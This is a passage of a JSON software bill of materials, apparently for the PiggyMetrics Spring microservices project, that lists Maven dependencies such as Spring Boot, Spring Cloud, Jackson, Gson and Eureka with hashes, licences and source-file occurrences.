"statistics-service\\src\\main\\java\\com\\piggymetrics\\statistics\\config\\ResourceServerConfig.java", "function": "tokenServices", "module": "com.piggymetrics.statistics.config.ResourceServerConfig", "package": "com.piggymetrics.statistics.config"}, {"column": 9, "fullFilename": "statistics-service\\src\\main\\java\\com\\piggymetrics\\statistics\\config\\ResourceServerConfig.java", "function": "tokenServices", "line": 23, "module": "com.piggymetrics.statistics.config.ResourceServerConfig", "package": "com.piggymetrics.statistics.config"}]}, "identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "binary-analysis", "value": "C:\\Users\\user\\AppData\\Local\\Temp\\mvn-deps-NPbV0h\\org\\springframework\\boot\\spring-boot-autoconfigure\\2.0.3.RELEASE\\spring-boot-autoconfigure-2.0.3.RELEASE.jar"}]}, "occurrences": [{"location": "account-service\\src\\main\\java\\com\\piggymetrics\\account\\AccountApplication.java#11"}, {"location": "auth-service\\src\\main\\java\\com\\piggymetrics\\auth\\AuthApplication.java#9"}, {"location": "config\\src\\main\\java\\com\\piggymetrics\\config\\ConfigApplication.java#7"}, {"location": "gateway\\src\\main\\java\\com\\piggymetrics\\gateway\\GatewayApplication.java#8"}, {"location": "monitoring\\src\\main\\java\\com\\piggymetrics\\monitoring\\MonitoringApplication.java#7"}, {"location": "notification-service\\src\\main\\java\\com\\piggymetrics\\notification\\NotificationServiceApplication.java#18"}, {"location": "registry\\src\\main\\java\\com\\piggymetrics\\registry\\RegistryApplication.java#7"}, {"location": "statistics-service\\src\\main\\java\\com\\piggymetrics\\statistics\\StatisticsApplication.java#21"}, {"location": "turbine-stream-service\\src\\main\\java\\com\\piggymetrics\\turbine\\TurbineStreamServiceApplication.java#8"}]}, "group": "org.springframework.boot", "hashes": [{"alg": "SHA-1", "content": "011bc4cc96b08fabad2b3186755818fa0b32d83f"}, {"alg": "MD5", "content": "0a52980d8c71d372ee9c6b100da7f49b"}, {"alg": "SHA3-384", "content": "5bfb3d163cfaaa467d760860d0c0e3825c1bccf2b62626822eb0eaa272bec13798b09b4137b109c58836c3d7566af73d"}, {"alg": "SHA-256", "content": "742df8010f51ac98a14ff19fbd6df1ef0aca7656ad475295fa90444389d2d9d4"}, {"alg": "SHA3-256", "content": "7d51c2f934ca270814c03cb35422d183a5fd16cce3b7a707047f7e1ae610b099"}, {"alg": "SHA-512", "content": "c2918394ff63ad616f64fd2900cc1c688f8772cf05a3f206d2521e2ab525bda29f6e87b18ca7ae4c4c6cd4a248032d51cc0a0d4806370166efbabc77173caac2"}, {"alg": "SHA-384", "content": "cad79a4a727581de121cc68864c456863f396e85adc7b1514bae5f874b5a50ce134ce7723c1697e297d4c61b29dcbd5c"}, {"alg": "SHA3-512", "content": "e057673f1fe4b86b0b3bd60d2feeef09549bd373cfd56e8d8a88b13272f8824b87bc8cfd02fb9739b1456ffa82567e1e99ca3cf6d5c1b7954cd0a0aa8f4d4299"}], "licenses": [{"license": {"id": "Apache-2.0"}}], "name": "spring-boot-autoconfigure", "publisher": "Pivotal Software, Inc.", "purl": "pkg:maven/org.springframework.boot/spring-boot-autoconfigure@2.0.3.RELEASE?type=jar", "scope": "required", "version": "2.0.3.RELEASE"}, {"bom-ref": "pkg:maven/org.springframework.boot/spring-boot-starter-aop@2.0.3.RELEASE?type=jar", "type": "framework", "description": "Starter for aspect-oriented programming with Spring AOP and AspectJ", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "binary-analysis", "value": "C:\\Users\\user\\AppData\\Local\\Temp\\mvn-deps-NPbV0h\\org\\springframework\\boot\\spring-boot-starter-aop\\2.0.3.RELEASE\\spring-boot-starter-aop-2.0.3.RELEASE.jar"}]}}, "group": "org.springframework.boot", "hashes": [{"alg": "SHA3-384", "content": "040f344c92763062c6fa2a6de1de4b07d4156db2e6a1b10189af28887a5dcd70a6b8eb505f953910310baaf42c9a06c1"}, {"alg": "SHA3-256", "content": "0b2ef68be5c3f07c5a385ca24cbf50cacffe25f38eb440df5bb2ea9e79d10ff3"}, {"alg": "MD5", "content": "0c857777c2044cd2ececee6b70c1cef5"}, {"alg": "SHA-512", "content": "329768326aa539dbdfda2d7eb79798deccc00948c05a6029159e25058832374789465df103da18fc88a949a08d0c439dde93b7383237106b7b92aac742f2a674"}, {"alg": "SHA-1", "content": "a78c7bc25fd51b217f078421dc40d13ddc3b9f8f"}, {"alg": "SHA-384", "content": "c6cd2c55f39efda38caf74099d2340b02d853c47cf688d66ca8fbcdbd674b1a9725d5553899f2c0ab5c65f5f11c41f10"}, {"alg": "SHA-256", "content": "ddfc437ff26e206e74d8d2b949a978dc39a5bfdade596ab280a9d56efff2d5b1"}, {"alg": "SHA3-512", "content": "ef3aecc2f2545c8224dff5e7dec998b3a2d94c6bb6296b08cf732f8488336431cd152cc15007ddb062cff00e465d9b288205dcbace1bab3859f069748d597674"}], "licenses": [{"license": {"id": "Apache-2.0"}}], "name": "spring-boot-starter-aop", "publisher": "Pivotal Software, Inc.", "purl": "pkg:maven/org.springframework.boot/spring-boot-starter-aop@2.0.3.RELEASE?type=jar", "scope": "required", "version": "2.0.3.RELEASE"}, {"bom-ref": "pkg:maven/org.springframework.cloud/spring-cloud-config-client@2.0.0.RELEASE?type=jar", "type": "framework", "description": "This project is a Spring configuration client.", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "binary-analysis", "value": "C:\\Users\\user\\AppData\\Local\\Temp\\mvn-deps-NPbV0h\\org\\springframework\\cloud\\spring-cloud-config-client\\2.0.0.RELEASE\\spring-cloud-config-client-2.0.0.RELEASE.jar"}]}}, "group": "org.springframework.cloud", "hashes": [{"alg": "SHA-384", "content": "15b9e5813ca5260a888248932b83b3e63cd27bf46ac5db0091718c7c6e91e5d78d7889da0b1fdbaaa12de74e0fdedc49"}, {"alg": "SHA3-256", "content": "263ebd750a961f58776b4cf085feb28381530eace5b8c75d9011eeb19a2bb98d"}, {"alg": "SHA3-512", "content": "3d3fd94e8f281be0c4d8059dfd199ac117afba71bbd777c412f7ec7c2937a2e0caa9f01197948f9df1ebb854e0082c7dc3881bf0b7f599607444c3d4bd3016dd"}, {"alg": "SHA3-384", "content": "48ae1e40ca060c109ce89ae48eba68bb348f05aaab6f074aec8c969b66e7b3a811e8bc6e8901c183c14085612bb01dfa"}, {"alg": "MD5", "content": "5f479b27ddaa0d47f0cc6e150ac05c33"}, {"alg": "SHA-1", "content": "7a3f4447664c61ff674c29a9b2ff0dc988dee316"}, {"alg": "SHA-256", "content": "a4c26aaa864418c008b3fb067ad3b54da9a968921db4bab47366b97bd8f8ca30"}, {"alg": "SHA-512", "content": "b545b2744f31d5cc8fd7cf89e42bf7dc1a4464d1761d28f48f7446906c6bd43ec2a696eac0ba2708723ebee36b1f6316f37972e24b76eb1a621f0f153779d4ea"}], "licenses": [{"license": {"id": "Apache-2.0"}}], "name": "spring-cloud-config-client", "publisher": "Pivotal Software, Inc.", "purl": "pkg:maven/org.springframework.cloud/spring-cloud-config-client@2.0.0.RELEASE?type=jar", "scope": "required", "version": "2.0.0.RELEASE"}, {"bom-ref": "pkg:maven/org.springframework.cloud/spring-cloud-netflix-core@2.0.0.RELEASE?type=jar", "type": "framework", "description": "Spring Cloud Netflix Core", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "binary-analysis", "value": "C:\\Users\\user\\AppData\\Local\\Temp\\mvn-deps-NPbV0h\\org\\springframework\\cloud\\spring-cloud-netflix-core\\2.0.0.RELEASE\\spring-cloud-netflix-core-2.0.0.RELEASE.jar"}]}}, "group": "org.springframework.cloud", "hashes": [{"alg": "MD5", "content": "2070a3bc6e5b770d52cdd65858ddda07"}, {"alg": "SHA3-384", "content": "77e17180e15dca51e4f3d69ff91cc90467f772d014c7a826595b5e1892a0f57bc4b4e037a59495558fefa71764fd5993"}, {"alg": "SHA-512", "content": "7814ad392c384ba4186f164e8b663e600a90c577de54ac89b967126cfe462ce08a2f295f7e54f94db3902f49de8838c70faec413d78a2d23a339a609cadcd41c"}, {"alg": "SHA-1", "content": "796bf4e966fac782c2118396d5504e01d5bd3115"}, {"alg": "SHA-256", "content": "8651ad06e6c91fadd5bf77fba528b9a23a66fb3b57b495ea8da20def6f3b5f6e"}, {"alg": "SHA-384", "content": "accd2bb47510f90c7df339cca211b5bf66321df9fdd5a157ed23adc012cd1f914cd94c4174cacb3e641b748ea4275e25"}, {"alg": "SHA3-256", "content": "cb9798a3a5fdf0b1c3233f60f16e9f9ee74e4d451318fb905221ee652828dfff"}, {"alg": "SHA3-512", "content": "e3f2ef307447c7e5cb994da1ca5c3ca390971a7d6062dbdf11f53cf28fe65eb5e1df31ec38474ab4e0feb2dddbc4b519a4984e5509212b5d79906eaaebed3f78"}], "licenses": [{"license": {"id": "Apache-2.0"}}], "name": "spring-cloud-netflix-core", "publisher": "Pivotal Software, Inc.", "purl": "pkg:maven/org.springframework.cloud/spring-cloud-netflix-core@2.0.0.RELEASE?type=jar", "scope": "required", "version": "2.0.0.RELEASE"}, {"bom-ref": "pkg:maven/org.springframework.cloud/spring-cloud-netflix-eureka-client@2.0.0.RELEASE?type=jar", "type": "framework", "description": "Spring Cloud Netflix Eureka Client", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "binary-analysis", "value": "C:\\Users\\user\\AppData\\Local\\Temp\\mvn-deps-NPbV0h\\org\\springframework\\cloud\\spring-cloud-netflix-eureka-client\\2.0.0.RELEASE\\spring-cloud-netflix-eureka-client-2.0.0.RELEASE.jar"}]}}, "group": "org.springframework.cloud", "hashes": [{"alg": "SHA3-384", "content": "237201a38459c81ecedba61d4d59a522cbea01b65297c1f068e11294dbc9da626035815b1846f08c1737058e33f021e9"}, {"alg": "SHA-256", "content": "7ff7145adc938be815a8055af0cdea0f720c6b356b57ac2136e53bcd5d25e97f"}, {"alg": "SHA-512", "content": "8a3f0018f3bdc5bb1ad4e246526cbdb422202d2b699c3a0cac0a765dd1d865f87b778a702f96ff2ad7b8ac6197afa46b6a6555c694ad57e0d3ce8608d071da73"}, {"alg": "MD5", "content": "8b93d4d30de32748b186aeacfa618f67"}, {"alg": "SHA3-256", "content": "cad94fdc93582973a4376fd3c4ee59ee34855af8f125db916de6e9b1a4b47793"}, {"alg": "SHA-384", "content": "dd690fb96277a00f46f6f81f53204d831853065abfc1bd57e61872b2c4c6858d26cd4be36d88cda8bd05e6e162c14299"}, {"alg": "SHA-1", "content": "e00b09813d5d3714dbbc150b91553267124e2250"}, {"alg": "SHA3-512", "content": "fcca16621c429111e17349f412e5f630df3aaed591e8c67457902512f293dbd890c40bd481660e1f95ab4ee3674450e37bf1291afad0e7d8f540c61c267217b4"}], "licenses": [{"license": {"id": "Apache-2.0"}}], "name": "spring-cloud-netflix-eureka-client", "publisher": "Pivotal Software, Inc.", "purl": "pkg:maven/org.springframework.cloud/spring-cloud-netflix-eureka-client@2.0.0.RELEASE?type=jar", "scope": "required", "version": "2.0.0.RELEASE"}, {"bom-ref": "pkg:maven/org.springframework.cloud/spring-cloud-starter-netflix-eureka-client@2.0.0.RELEASE?type=jar", "type": "framework", "description": "Spring Cloud Starter Netflix Eureka Client", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "binary-analysis", "value": "C:\\Users\\user\\AppData\\Local\\Temp\\mvn-deps-NPbV0h\\org\\springframework\\cloud\\spring-cloud-starter-netflix-eureka-client\\2.0.0.RELEASE\\spring-cloud-starter-netflix-eureka-client-2.0.0.RELEASE.jar"}]}}, "group": "org.springframework.cloud", "hashes": [{"alg": "SHA3-256", "content": "2d792b6b575950436fe620ac173535a7fa0b7deccf290cbeb37ae7a21b6f6416"}, {"alg": "SHA-512", "content": "2e512df35dff02c0814d1a59a7ba7dbf8a4280c1658565c115f5a599f80401df9d5da043b3c0868230b79ba7c04ec53138f98aeede29fd703ae2ea25d7f357b4"}, {"alg": "SHA3-384", "content": "3a5cd5b3839f0fc79088457664f01597a6f948aa76efda13886f9144fa826b801ecf9b4d2b8135dd2d7d139fb985cacc"}, {"alg": "SHA3-512", "content": "3aa2f65011ba5f3923f0925d1b85180528ab5c57293353b3022ed8e3f90798a77cf13eae4beaea7d54eb60049a4776f5d9c994d56727c8bd7f8e4b9b39aa9d98"}, {"alg": "SHA-256", "content": "4686ea441f3b924e7f1631d49a6fb89a771a778fc7fd32612163d3c60ec21d14"}, {"alg": "MD5", "content": "46d482bf052f34fc1fde298864af2215"}, {"alg": "SHA-1", "content": "4e241e6685a4dfc45987945df6c2477503ae20d7"}, {"alg": "SHA-384", "content": "fe253756cdd8724e26477c505988966012a1e103b07e2f404967ed6760f0cb934d288c5aef8883f462e19a2fe9ea9841"}], "licenses": [{"license": {"id": "Apache-2.0"}}], "name": "spring-cloud-starter-netflix-eureka-client", "publisher": "Pivotal Software, Inc.", "purl": "pkg:maven/org.springframework.cloud/spring-cloud-starter-netflix-eureka-client@2.0.0.RELEASE?type=jar", "scope": "required", "version": "2.0.0.RELEASE"}, {"bom-ref": "pkg:maven/org.springframework/spring-aop@5.0.7.RELEASE?type=jar", "type": "framework", "description": "Spring AOP", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "binary-analysis", "value": "C:\\Users\\user\\AppData\\Local\\Temp\\mvn-deps-NPbV0h\\org\\springframework\\spring-aop\\5.0.7.RELEASE\\spring-aop-5.0.7.RELEASE.jar"}]}}, "group": "org.springframework", "hashes": [{"alg": "SHA-512", "content": "24ba927d8ea0ca58a8a6722fe99ed165b7174926a3f2ac731eaa8383e7f6b9f74caf7ae39562ef9ee324914ccf8ad5b6b7270bfc688a461c6feed089e778dffb"}, {"alg": "SHA-256", "content": "2de906598bfb44d3e6833c36e1ad9c565275af16da25e13e6f676126f613908c"}, {"alg": "SHA3-256", "content": "3f0c5849b9b772b3544611b78300843d6751fac5bf80dbec44a07d0fb95bb75c"}, {"alg": "SHA-384", "content": "67209dd624bfaa95f376772e89f0e574b971d9224a2c5ca91645a9a00b3e25ab8c4594e96ac7de09c2ac111767ec39ad"}, {"alg": "MD5", "content": "cd592093caba2866661a095786f1ed11"}, {"alg": "SHA3-512", "content": "e3871a6dea5b1a64cc8fba9b05a48a83b3924190f9eab5d576583ec9060cbf1982133f845360f0aa2f05cd9dab6b00a6e5f5dff5d8a33914848fff9bfe0f63d4"}, {"alg": "SHA3-384", "content": "e5a7367855624bc08bbf442cece3b894a285068b7a328e3451818fda2d9a148678c736a18d98eef1a6490587329015f2"}, {"alg": "SHA-1", "content": "fdd0b6aa3c9c7a188c3bfbf6dfd8d40e843be9ef"}], "licenses": [{"license": {"id": "Apache-2.0"}}], "name": "spring-aop", "publisher": "Spring IO", "purl": "pkg:maven/org.springframework/spring-aop@5.0.7.RELEASE?type=jar", "scope": "required", "version": "5.0.7.RELEASE"}, {"bom-ref": "pkg:maven/org.springframework/spring-beans@5.0.7.RELEASE?type=jar", "type": "framework", "description": "Spring Beans", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "binary-analysis", "value": "C:\\Users\\user\\AppData\\Local\\Temp\\mvn-deps-NPbV0h\\org\\springframework\\spring-beans\\5.0.7.RELEASE\\spring-beans-5.0.7.RELEASE.jar"}]}, "occurrences": [{"location": "account-service\\src\\main\\java\\com\\piggymetrics\\account\\config\\ResourceServerConfig.java#28"}]}, "group": "org.springframework", "hashes": [{"alg": "SHA-256", "content": "0d0adc1832406304985a72d2c79c6d0af481f34ae2a9c4a3835c9b0968da25e3"}, {"alg": "SHA-512", "content": "58b8e141981594d43cc52fd179f512a1919eaa4ddd323127302fd753b5befb1b5ee8fc3b70adf4963bdaa181ac3ff67ed643bdacdde2881c26f12f55d3c34190"}, {"alg": "SHA3-256", "content": "72ae91c81771a542fb4ce30b45608b43dcfe03d9e18070763e7421fa0389d52c"}, {"alg": "SHA-1", "content": "c1196cb3e56da83e3c3a02ef323699f4b05feedc"}, {"alg": "MD5", "content": "c850badbb984cda6983da22c8672a59f"}, {"alg": "SHA-384", "content": "d2aaea6cd85065710cdc27d25dfd7bdfdea57f0f796214767e83f09b967c6cb2c954369a40e2e6f55f4106b43d099558"}, {"alg": "SHA3-512", "content": "ecb8c1471d73b885db4b4796a95a1af1e229f33724f2d3cbdf8df947f84fd1dcc6064a8ef2552189304df475283c9c899d4bcb3bdf3a0f97390aed50d0f8815b"}, {"alg": "SHA3-384", "content": "f35b746798ceaad156b257f6c208cc3e9783244d68501187af355a98613c048b62cee350b728c67fc067ddca41fabbe1"}], "licenses": [{"license": {"id": "Apache-2.0"}}], "name": "spring-beans", "publisher": "Spring IO", "purl": "pkg:maven/org.springframework/spring-beans@5.0.7.RELEASE?type=jar", "scope": "required", "version": "5.0.7.RELEASE"}, {"bom-ref": "pkg:maven/org.springframework/spring-web@5.0.7.RELEASE?type=jar", "type": "framework", "description": "Spring Web", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "binary-analysis", "value": "C:\\Users\\user\\AppData\\Local\\Temp\\mvn-deps-NPbV0h\\org\\springframework\\spring-web\\5.0.7.RELEASE\\spring-web-5.0.7.RELEASE.jar"}]}, "occurrences": [{"location": "account-service\\src\\main\\java\\com\\piggymetrics\\account\\client\\AuthServiceClient.java#12"}, {"location": "account-service\\src\\main\\java\\com\\piggymetrics\\account\\client\\StatisticsServiceClient.java#13"}, {"location": "account-service\\src\\main\\java\\com\\piggymetrics\\account\\controller\\AccountController.java#13"}, {"location": "account-service\\src\\main\\java\\com\\piggymetrics\\account\\controller\\AccountController.java#20"}, {"location": "account-service\\src\\main\\java\\com\\piggymetrics\\account\\controller\\AccountController.java#25"}, {"location": "account-service\\src\\main\\java\\com\\piggymetrics\\account\\controller\\AccountController.java#30"}, {"location": "account-service\\src\\main\\java\\com\\piggymetrics\\account\\controller\\AccountController.java#35"}, {"location": "account-service\\src\\main\\java\\com\\piggymetrics\\account\\controller\\ErrorHandler.java#10"}, {"location": "account-service\\src\\main\\java\\com\\piggymetrics\\account\\controller\\ErrorHandler.java#17"}, {"location": "account-service\\src\\main\\java\\com\\piggymetrics\\account\\controller\\ErrorHandler.java#18"}, {"location": "account-service\\src\\main\\java\\com\\piggymetrics\\account\\service\\security\\CustomUserInfoTokenServices.java#129"}, {"location": "auth-service\\src\\main\\java\\com\\piggymetrics\\auth\\controller\\UserController.java#15"}, {"location": "auth-service\\src\\main\\java\\com\\piggymetrics\\auth\\controller\\UserController.java#16"}, {"location": "auth-service\\src\\main\\java\\com\\piggymetrics\\auth\\controller\\UserController.java#22"}, {"location": "auth-service\\src\\main\\java\\com\\piggymetrics\\auth\\controller\\UserController.java#28"}, {"location": "notification-service\\src\\main\\java\\com\\piggymetrics\\notification\\client\\AccountServiceClient.java#12"}, {"location": "notification-service\\src\\main\\java\\com\\piggymetrics\\notification\\controller\\RecipientController.java#14"}, {"location": "notification-service\\src\\main\\java\\com\\piggymetrics\\notification\\controller\\RecipientController.java#15"}, {"location": "notification-service\\src\\main\\java\\com\\piggymetrics\\notification\\controller\\RecipientController.java#21"}, {"location": "notification-service\\src\\main\\java\\com\\piggymetrics\\notification\\controller\\RecipientController.java#26"}, {"location": "statistics-service\\src\\main\\java\\com\\piggymetrics\\statistics\\client\\ExchangeRatesClient.java#13"}, {"location": "statistics-service\\src\\main\\java\\com\\piggymetrics\\statistics\\controller\\StatisticsController.java#14"}, {"location": "statistics-service\\src\\main\\java\\com\\piggymetrics\\statistics\\controller\\StatisticsController.java#20"}, {"location": "statistics-service\\src\\main\\java\\com\\piggymetrics\\statistics\\controller\\StatisticsController.java#26"}, {"location": "statistics-service\\src\\main\\java\\com\\piggymetrics\\statistics\\controller\\StatisticsController.java#32"}]}, "group": "org.springframework", "hashes": [{"alg": "SHA-1", "content": "2e04c6c2922fbfa06b5948be14a5782db168b6ec"}, {"alg": "SHA3-384", "content": "797a7bd86ef730de5377d6fc66c1b7d03188260b62fbb72a58fbc025926877bbc94b5a7c7a03e4f4e1c0b12fe9a3df13"}, {"alg": "SHA-384", "content": "8af38fbf471db8437161cca583b115bad2084544661de14b98f023013eac4a735e7f820bdaf72118e55b5cbaf78cf1da"}, {"alg": "MD5", "content": "cdb97ca6e419ea429244db6b01ea9d09"}, {"alg": "SHA-256", "content": "d100479905e911a3201de66566f59bd5e2d4137f9d95b6d314acbb80ae985d22"}, {"alg": "SHA-512", "content": "da438577b4aeb0722ecfcaccfc43a37a07c78fdd6badc87caceb3abe58f31f82df9199e26a6b889a24bfe30cdf47626fbe8c4eb68e0f49497bd4b34e99f88b66"}, {"alg": "SHA3-512", "content": "e15fe01672fed6048e69d14ff865ce2986343d339c4ed806e5de0a2038b01a25dbbf457d3aa399692e8d8ad834c03e84619f683cd5bfee03facbf4500fbc51bb"}, {"alg": "SHA3-256", "content": "f86905c962d81e77ccdfeb4e189aad1cd22d015f7b35cb676a940e39aeb7c284"}], "licenses": [{"license": {"id": "Apache-2.0"}}], "name": "spring-web", "publisher": "Spring IO", "purl": "pkg:maven/org.springframework/spring-web@5.0.7.RELEASE?type=jar", "scope": "required", "version": "5.0.7.RELEASE"}], "libraries": [{"bom-ref": "pkg:maven/com.fasterxml.jackson.core/jackson-annotations@2.9.0?type=jar", "type": "library", "description": "Core annotations used for value types, used by Jackson data binding package.", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "binary-analysis", "value": "C:\\Users\\user\\AppData\\Local\\Temp\\mvn-deps-NPbV0h\\com\\fasterxml\\jackson\\core\\jackson-annotations\\2.9.0\\jackson-annotations-2.9.0.jar"}]}, "occurrences": [{"location": "statistics-service\\src\\main\\java\\com\\piggymetrics\\statistics\\domain\\ExchangeRatesContainer.java#9"}]}, "group": "com.fasterxml.jackson.core", "hashes": [{"alg": "SHA-1", "content": "07c10d545325e3a6e72e06381afe469fd40eb701"}, {"alg": "SHA-512", "content": "266589c36ea544ebca94aecd76ba9dfe88637563b94cf24e46846466b103074c9f95508bfa237c20d0ab9c60bfb6befa2628236dcf7222a69cf1ef9462bcf0b3"}, {"alg": "SHA-384", "content": "36289e4a5d6774c4fc6ed38a632a681759a4bc0389616a79edd22298dbcbe8f1bc7a107f00a9ec76b492d125c890a939"}, {"alg": "SHA-256", "content": "45d32ac61ef8a744b464c54c2b3414be571016dd46bfc2bec226761cf7ae457a"}, {"alg": "SHA3-256", "content": "5ad4c52561d43e8f80798256ae39449955b2d34376d3fbb9f354f9fcb61f477a"}, {"alg": "SHA3-512", "content": "8322ba66c29bfa8152a4c6294f6c3350d7a59fce154ba9db8624e369085aae42585addf864f373d250f76e5678b5967ecac79aff9255d96e5c109f310424f208"}, {"alg": "MD5", "content": "c09faa1b063681cf45706c6df50685b6"}, {"alg": "SHA3-384", "content": "d575397eff488d8b2e2098f1bcc8c0a7d49a3c0532ecec9c2996709576cf9fffe967f421dab2c4d2e280867efefd71af"}], "licenses": [{"license": {"id": "Apache-2.0"}}], "name": "jackson-annotations", "publisher": "FasterXML", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-annotations@2.9.0?type=jar", "scope": "required", "version": "2.9.0"}, {"bom-ref": "pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.6?type=jar", "type": "library", "description": "General data-binding functionality for Jackson: works on core streaming API", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "binary-analysis", "value": "C:\\Users\\user\\AppData\\Local\\Temp\\mvn-deps-NPbV0h\\com\\fasterxml\\jackson\\core\\jackson-databind\\2.9.6\\jackson-databind-2.9.6.jar"}]}, "occurrences": [{"location": "account-service\\src\\test\\java\\com\\piggymetrics\\account\\controller\\AccountControllerTest.java#114"}, {"location": "account-service\\src\\test\\java\\com\\piggymetrics\\account\\controller\\AccountControllerTest.java#118"}, {"location": "account-service\\src\\test\\java\\com\\piggymetrics\\account\\controller\\AccountControllerTest.java#131"}, {"location": "account-service\\src\\test\\java\\com\\piggymetrics\\account\\controller\\AccountControllerTest.java#143"}, {"location": "auth-service\\src\\test\\java\\com\\piggymetrics\\auth\\controller\\UserControllerTest.java#51"}, {"location": "notification-service\\src\\test\\java\\com\\piggymetrics\\notification\\controller\\RecipientControllerTest.java#53"}, {"location": "statistics-service\\src\\test\\java\\com\\piggymetrics\\statistics\\controller\\StatisticsControllerTest.java#114"}]}, "group": "com.fasterxml.jackson.core", "hashes": [{"alg": "SHA3-512", "content": "480f9d8a7e5c2cb7ff981b3e004708dd632f8c472a8da3114486499a15a4bfa21ee4904e4ac5f0d1aef4dccd19fc95ceb1f9f6d5a65ea13ca2a7d9815585f82e"}, {"alg": "SHA-256", "content": "657e3e979446d61f88432b9c50f0ccd9c1fe4f1c822d533f5572e4c0d172a125"}, {"alg": "SHA-384", "content": "80682058957cb75863d94f0ed223dc69cad95526e41b80d2810bfb04308c6fbd4bf4df90f43edacd8f820d43296b61ea"}, {"alg": "SHA3-256", "content": "885a3161af0a28a56a7d41631034921b846f9b1b0e02062e0758b17337026bdf"}, {"alg": "SHA3-384", "content": "a5682de7a39422fde523ad1d6fe2db75a4a390266692362e296115e06e07e515cb6b85598ada103e54031dbefc5ea7f3"}, {"alg": "MD5", "content": "c6634d654c2df15a987bc37ec8d2b6b2"}, {"alg": "SHA-1", "content": "cfa4f316351a91bfd95cb0644c6a2c95f52db1fc"}, {"alg": "SHA-512", "content": "f0861f775e2aebd61df8a39419f959b61019af7b307812b92beb14d7a234edeaf09c054fbb24a1432f4dd0c726b7d2b535bdc3ecb8b3d00b661e01d4d46ec4be"}], "licenses": [{"license": {"id": "Apache-2.0"}}], "name": "jackson-databind", "publisher": "FasterXML", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.6?type=jar", "scope": "required", "version": "2.9.6"}, {"bom-ref": "pkg:maven/com.google.code.gson/gson@2.8.5?type=jar", "type": "library", "description": "Gson JSON library", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "binary-analysis", "value": "C:\\Users\\user\\AppData\\Local\\Temp\\mvn-deps-NPbV0h\\com\\google\\code\\gson\\gson\\2.8.5\\gson-2.8.5.jar"}]}}, "group": "com.google.code.gson", "hashes": [{"alg": "MD5", "content": "089104cb90d8b4e1aa00b1f5faef0742"}, {"alg": "SHA3-512", "content": "0aed985c19435fb6d5e04a79a7553f56a66814157ac93addcb24f9286321d0063b69ac008501f0e22f691ecb15a50491d3313aee73a745286454817e2f410fe9"}, {"alg": "SHA-256", "content": "233a0149fc365c9f6edbd683cfe266b19bdc773be98eabdaf6b3c924b48e7d81"}, {"alg": "SHA-512", "content": "5dd7214c542a7b93aab3eab0ba13e4ac3d6ddb05c795fb6d3992e21925a98dce87cb186ac67b4d3ad146f96e14d38b3892837eca57a27b4e845aca6d4e4f708a"}, {"alg": "SHA-384", "content": "77f4d6efe8d9cf78b72f34e439035d266db1b82c9d96e6b78e6c571d4c719bb5f2b78e8377263280c6cc9dffe18b3d16"}, {"alg": "SHA3-256", "content": "94cde12c15a685a10309653cfef73d14d09b340f1b8f0a9a04267136e9bf2820"}, {"alg": "SHA3-384", "content": "953e2eca6de4a05e1cf86a9750aa9f1d10bfd06a15f7eaab4a59716cbec74a7bf6c5f421b1752d487882954daecc5781"}, {"alg": "SHA-1", "content": "f645ed69d595b24d4cf8b3fbb64cc505bede8829"}], "licenses": [{"license": {"id": "Apache-2.0"}}], "name": "gson", "purl": "pkg:maven/com.google.code.gson/gson@2.8.5?type=jar", "scope": "required", "version": "2.8.5"}, {"bom-ref": "pkg:maven/com.netflix.eureka/eureka-client@1.9.2?type=jar", "type": "library", "description": "eureka-client", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "binary-analysis", "value": "C:\\Users\\user\\AppData\\Local\\Temp\\mvn-deps-NPbV0h\\com\\netflix\\eureka\\eureka-client\\1.9.2\\eureka-client-1.9.2.jar"}]}}, "group": "com.netflix.eureka", "hashes": [{"alg": "SHA-256", "content": "279fc7616a9c0c904dd11ba53aaeec0790d35511cbda2a81e8606b6c6a13c7f3"}, {"alg": "SHA3-256", "content": "2ed92d790b33a71dcc8de331d77bdde3c823ced8521ad0cd6e1f75430fdb04bf"}, {"alg": "SHA-512", "content": "3abb8075ff7ece646f8ae62c840a8b79b1163741a41e84a7dd7af939f554c6e2f9057ca901d10fe639b693fb9223a2f74bce00743b421a9263acdb246eeee7cb"}, {"alg": "SHA-1", "content": "47c0b71d8face149833c4958ac7b3b6171861f4c"}, {"alg": "SHA-384", "content": "99475120ea6b3ca18098f3346fe2a7ca539a472d2110e0aedf96d941403a1f37049df31785d1e4e3257adf44d0a5630a"}, {"alg": "SHA3-512", "content": "b0f8d56fa259be87844612709b83ba3611548215d405ecd02220a22e1539d2666a5cf37b51ca618291f92dbb007dfd4a6dfa037905bfd0d313b8221cc2605c5b"}, {"alg": "SHA3-384", "content": "b7a195e9f54f4189c8e27624ba44c5ff191ffe977d6e70ffc6d1795a4f4d4d3869d15992e555eed71cb427f744fd3b9b"}, {"alg": "MD5", "content": "f1a16ca3654e743409bb60c47eb02f01"}], "licenses": [{"license": {"id": "Apache-2.0"}}], "name": "eureka-client", "purl": "pkg:maven/com.netflix.eureka/eureka-client@1.9.2?type=jar", "scope": "required", "version": "1.9.2"}, {"bom-ref": "pkg:maven/com.netflix.netflix-commons/netflix-eventbus@0.3.0?type=jar", "type": "library", "description": "netflix-eventbus", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "binary-analysis", "value": 